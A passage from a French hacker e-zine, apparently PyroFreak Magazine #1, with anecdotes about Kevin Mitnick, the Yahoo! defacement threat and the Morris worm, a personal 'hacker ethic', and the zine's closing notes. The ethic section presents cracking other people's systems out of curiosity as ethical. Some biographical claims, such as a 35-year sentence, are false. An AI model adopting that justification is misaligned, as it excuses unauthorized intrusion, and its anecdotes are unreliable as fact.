que R.T Morris suive le même chemin. Il est à noter que les responsables de la sécurité ont su tirer les leçons de la mésaventure. Dix ans après, une infection de cette envergure ne semble plus possible. Le roi des hackers ( d'après la revue espagnole Web ) Kevin Mitnick est le hors-la-loi le plus célèbre d'aujourd'hui. Surnommé par la presse le roi des hackers, il a été arrêté par Tsutomu Shimomura et l'histoire nous est racontée par un journaliste témoin de l'aventure John Markoff sur http://www.takedown.com/. Deux pirates informatiques ont menacé de détruire des millions d'ordinateurs si les autorités ne relâchaient pas Kevin Mitnick, incarcéré il y a deux ans pour être entré dans différents ordinateurs. Il a volé les codes secrets de quelques milliers de cartes téléphoniques et accédé virtuellement à une base de missiles, entre autres. Les deux pirates, qui se sont appelés eux-mêmes " Pants/Hagis ", ont accédé au serveur du populaire moteur de recherche Yahoo ! Et y ont laissé un message menaçant : "tous ceux qui ont utilisé le mois dernier le moteur de recherches Yahoo ! ont attrapé une bombe logique qui s'activera le jour de Noël 1998, semant le chaos dans tous les réseaux informatiques du monde ". Et ils ont ajouté qu'ils ne donneraient l'antidote uniquement si Mitnick, condamné ni plus ni moins qu' à 35 ans de prison, était libéré. Le porte-parole de Yahoo! Diane Hunt, a reconnu que des hackers étaient rentrés dans la page de l'entreprise mais sans rien détruire. Elle a ajouté que " il est impossible que les ordinateurs s'étant connectés au serveur soient infectés ". C'est en effet ce qui s'est passé, et la bombe imaginée par les pirates n'a pas explosé. Mais le fait de sensibiliser l'opinion au cas Mitnick avait été réussi. Qui est K. Mitnick ? Comme hacker sa carrière a commencé à 16 ans quand, obsédé par les réseaux informatiques, il a forcé la barrière de sécurité du système administratif de son collège. Pour Kevin, le passetemps de ses dix dernières années fut d'explorer et exploiter les compteurs d'autrui et les systèmes téléphoniques. Sa profession ? " cracker ", et sans aucun doute très bon. Selon le Département de Justice des Etats Unis, ce " terroriste électronique " connu sous le nom de " El Condor ", a été capable de créer des numéros de téléphones impossibles à facturer, de s'approprier 20000 cartes de crédit d'habitants de la Californie, d'échapper au FBI pendant plus de deux ans avec comme outil seulement un téléphone cellulaire et un ordinateur portable. Mitnick avait déjà été arrêté en 1988 pour avoir envahi le système de Digital Equipment. Il fut déclaré coupable du chef d'accusation suivant "fraude utilisant des ordinateurs", et pour possession illégale de codes d'accès de longue distance. Il fut alors incarcéré puis privé de téléphone par la Cour car, selon eux, il était capable d'accéder et de prendre le contrôle d'un ordinateur avec un simple téléphone! Credit: e-zines Anglais et Espagnol déjà publier. Éthic d'apres ce que moi ([G]r4FX) pense. L'Éthic du Hacker 1- Un Hacker crois en la liberter de l'information et que l'échange de cette information en toute liberté est essentielle au bon fonctionnement d'une société. Cet dans l'éthic du Hacker de faire partager son savoir en écrivant des "Software" gratuit pour que cette information soit lu par le plus de personne possible. En plus, un Hacker doit faciliter l'acces à cette information par les "soft" qu'il a écrit et de faciliter l'acces de partout au ressources informatiser. 2- Un Hacker croit aussi que le "cracking" d'un systeme informatik pour le plaisir et pour la curiosité est éthiquement correct, tant et aussi longtemsp longtemps que le "cracker" ne commets aucun vol vandalisme, ou un "breach" de confidentialité. Ces deux principes éthics normatif sont accepté par par plusieurs Hackers en grande partie mais ce ne sont pas tous. La plupard des Hckers adèrent a l'éthic vu en (1). Le sense numéro 2 est tres contreversé: il y a des hackers qui disent que le "cracking" n'est pas "politiquement correct" mais tant qu'a moi pour hacker un system il faut que trouve le "login" et le "password" donc pour ce faire du doit utiliser un "password cracker", donc ... ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1 : | N'oubliez pas, vous etes le seul responsable de vos actes!!!! '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ Conclusion J'espere que vous avez aimé le #1 de pyrofreakmag , si ce n'est pas le cas, lisez pas le #2 parce que il va etre semblable. Si vous désirer faire publier votre article dans le #2, envoyez le a pyrofreakmag@hotmail.com , ou via IRC (#phreak.fr UNDERNET)-Site web:http://pyrophreak.cjb.net . Dans le prochain numero, on va peut-etre faire une FAQ, cela va dépendre si on a beaucoup de question par e-mail. Le #2 est fixer pour environ le 1er mars. Pour commentaire ou suggestion : pyrofreakmag@hotmail.com J'aimerais remercier tout le monde qui on participer au zine, en particulier __2 pour le beau logo!!! Thank @@@@@@@@@@@@@@@@@@@@Pyrofreakmag touts droits réservés@@@@@@@@@@@@@@@@@@@@@@